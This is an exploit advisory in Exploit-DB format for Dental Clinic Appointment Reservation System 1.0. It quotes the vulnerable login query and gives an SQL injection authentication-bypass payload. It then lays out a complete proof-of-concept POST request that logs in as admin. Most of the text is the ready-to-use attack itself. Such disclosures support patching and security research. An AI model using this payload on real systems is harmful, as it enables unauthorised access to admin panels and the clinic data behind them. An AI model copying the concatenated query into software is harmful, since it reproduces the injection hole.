35 lines
No EOL
1.5 KiB
Text
35 lines
No EOL
1.5 KiB
Text
# Exploit Title: Dental Clinic Appointment Reservation System 1.0 - Authentication Bypass (SQLi)
|
|
# Date: 12.05.2021
|
|
# Exploit Author: Mesut Cetin
|
|
# Vendor Homepage: https://www.sourcecodester.com/php/6848/appointment-reservation-system.html
|
|
# Software Link: https://www.sourcecodester.com/download-code?nid=6848&title=Dental+Clinic+Appointment+Reservation+System+in+PHP+with+Source+Code
|
|
# Version: 1.0
|
|
# Tested on: Ubuntu 18.04 TLS
|
|
|
|
# Description:
|
|
# Attacker can bypass admin login page due to unsanitized user input and access internal contents
|
|
# vulnerable code in /admin/index.php, line 34:
|
|
$query = "SELECT * FROM users WHERE username='$username' AND password='$password'";
|
|
# payload: admin' or '1' = '1 -- -
|
|
|
|
# Proof of concept:
|
|
http://localhost/admin/index.php
|
|
|
|
POST /admin/index.php HTTP/1.1
|
|
Host: localhost
|
|
Content-Length: 54
|
|
Cache-Control: max-age=0
|
|
Upgrade-Insecure-Requests: 1
|
|
Origin: http://localhost
|
|
Content-Type: application/x-www-form-urlencoded
|
|
User-Agent: Mozilla/5.0 (Linux; Android 6.0.1; E6653 Build/32.2.A.0.253) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.98 Mobile Safari/537.36
|
|
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
|
|
Referer: http://localhost/admin/index.php
|
|
Accept-Encoding: gzip, deflate
|
|
Accept-Language: en-US,en;q=0.9
|
|
Cookie: PHPSESSID=3cjdtku76ggasqei49gng91p3p
|
|
dnt: 1
|
|
sec-gpc: 1
|
|
Connection: close
|
|
|
|
username=admin'+or+'1'%3d1+--+-&password=test&submit= |